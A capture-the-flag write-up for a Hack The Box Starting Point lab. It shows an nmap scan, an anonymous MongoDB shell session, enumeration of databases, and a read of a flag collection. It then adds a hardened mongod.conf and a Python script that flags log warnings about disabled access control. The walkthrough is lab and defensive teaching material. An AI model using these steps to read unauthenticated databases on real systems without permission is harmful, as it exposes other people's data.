This is another of the Very easy HTB Starting Point boxes.
$ nmap -sV -p- 10.129.143.75 --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-08 16:50 CEST
Nmap scan report for 10.129.143.75
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds
As we can see in the Nmap results, we have MongoDB version 3.6.8 listening on port 27017.
MongoDB is a NoSQL database.
You can find more information in their documentation here: https://www.mongodb.com/docs
To be able to interact with the database, we need to install the MongoDB client package on our Kali Linux.
It is included in the Kali repository, so we just need to use apt.
$ sudo apt install mongodb
We try to connect and realise that anonymous connections are accepted, so no credentials are needed. The server's own startup warnings below confirm it: access control is not enabled.
$ mongo mongodb://10.129.143.75:27017
MongoDB shell version v6.0.1
connecting to: mongodb://10.129.143.75:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("d732a698-b4ef-42d3-b3ae-d608e4802c33") }
MongoDB server version: 3.6.8
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
https://community.mongodb.com
---
The server generated these startup warnings when booting:
2022-10-08T14:49:44.575+0000 I STORAGE [initandlisten]
2022-10-08T14:49:44.575+0000 I STORAGE [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2022-10-08T14:49:44.575+0000 I STORAGE [initandlisten] ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten]
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten] ** WARNING: Access control is not enabled for the database.
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten] ** Read and write access to data and configuration is unrestricted.
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten]
---
>
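The two CONTROL warnings above are the server telling its administrator exactly what is wrong. As an added illustration (not part of the original write-up, and not the box's real configuration file), here is the mongod.conf state that produces those warnings next to the corrected one. The only real option names used are security.authorization and net.bindIp; the addresses are constructed placeholders.

```yaml
# --- Weak: what a server that prints "Access control is not enabled" looks like ---
# (constructed example; no "security" section means authorization defaults to disabled)
net:
  bindIp: 0.0.0.0        # reachable from every interface, including the network Nmap scanned
  port: 27017

# --- Hardened: require authentication and stop listening on external interfaces ---
security:
  authorization: enabled # every operation needs a user with a role; anonymous "show dbs" fails
net:
  bindIp: 127.0.0.1      # or the internal address the application actually connects from
  port: 27017
```

With authorization enabled, the first administrative user has to be created through the localhost exception (db.createUser in the admin database from a shell on the host itself) before remote clients can authenticate; after that, the anonymous session shown in this write-up is refused, and the startup warning disappears from the log.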
Now we can list the databases available on the server with the show dbs command.
>show dbs
admin 0.000GB
config 0.000GB
local 0.000GB
sensitive_information 0.000GB
users 0.000GB
With use <database_name> we can switch to the corresponding database.
>use sensitive_information
switched to db sensitive_information
show collections prints a list of all collections in the current database.
>show collections
flag
db.collection.find().pretty() finds all documents in the collection and returns them in a format that is easy to read.
>db.flag.find().pretty()
{
"_id" : ObjectId("630e3dbcb82540ebbd1748c5"),
"flag" : "1b6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
}
Our flag is then: 1b6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX
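From the defender's side, the quickest way to catch a deployment like this one is to watch mongod's own log for the startup warnings the shell echoed earlier in this write-up. The following Python script is an added example, not code from the original post or from MongoDB: it parses lines in the 3.x plain-text log format (timestamp, severity, component, [context], message) and reports the warnings that mean the server accepts unauthenticated read/write access. The sample log is constructed from the warning lines shown on this page plus one made-up connection line.

```python
"""Audit mongod startup log lines for the "no access control" warnings.

Added example. Assumes the MongoDB 3.x log line layout:
    <timestamp> <severity> <component> [<context>] <message>
The warning texts below are the ones the server printed on this page.
"""
import re
from dataclasses import dataclass

LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<severity>[A-Z])\s+(?P<component>\S+)\s+"
    r"\[(?P<context>[^\]]+)\]\s*(?P<msg>.*)$"
)

# Warning text -> short finding key. Only these two indicate an exposed server;
# the XFS/WiredTiger advice is a performance note, not a security one.
RISKY_WARNINGS = {
    "Access control is not enabled for the database.": "no-auth",
    "Read and write access to data and configuration is unrestricted.": "unrestricted-rw",
}


@dataclass
class Finding:
    ts: str
    component: str
    key: str
    message: str


def parse_line(line):
    """Split one log line into its fields, or return None if it is not a mongod line."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def audit(lines):
    """Return a Finding for every risky '** WARNING' line, in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        msg = rec["msg"]
        if not msg.startswith("**"):          # startup warnings are prefixed with "**"
            continue
        text = msg.lstrip("*").strip()
        if text.startswith("WARNING:"):       # the second line of a warning has no "WARNING:" tag
            text = text[len("WARNING:"):].strip()
        key = RISKY_WARNINGS.get(text)
        if key:
            findings.append(Finding(rec["ts"], rec["component"], key, text))
    return findings


def audit_text(text):
    return audit(text.splitlines())


def is_exposed(findings):
    """True when the server started without access control."""
    return any(f.key == "no-auth" for f in findings)


# Constructed sample: the four warning lines from the page plus one invented connection line.
SAMPLE_LOG = """\
2022-10-08T14:49:44.575+0000 I STORAGE [initandlisten]
2022-10-08T14:49:44.575+0000 I STORAGE [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten] ** WARNING: Access control is not enabled for the database.
2022-10-08T14:49:48.017+0000 I CONTROL [initandlisten] ** Read and write access to data and configuration is unrestricted.
2022-10-08T14:49:50.000+0000 I NETWORK [listener] connection accepted from 10.0.0.5:51234 #1 (1 connection now open)
"""

if __name__ == "__main__":
    for f in audit_text(SAMPLE_LOG):
        print(f"{f.ts} {f.component} {f.key}: {f.message}")
    print("EXPOSED" if is_exposed(audit_text(SAMPLE_LOG)) else "ok")
```

Run it against /var/log/mongodb/mongod.log (or feed the lines from a log shipper) and alert on any "no-auth" finding; on the box in this write-up the script reports both warnings and flags the server as exposed, which is exactly the condition that let an anonymous shell read the flag collection.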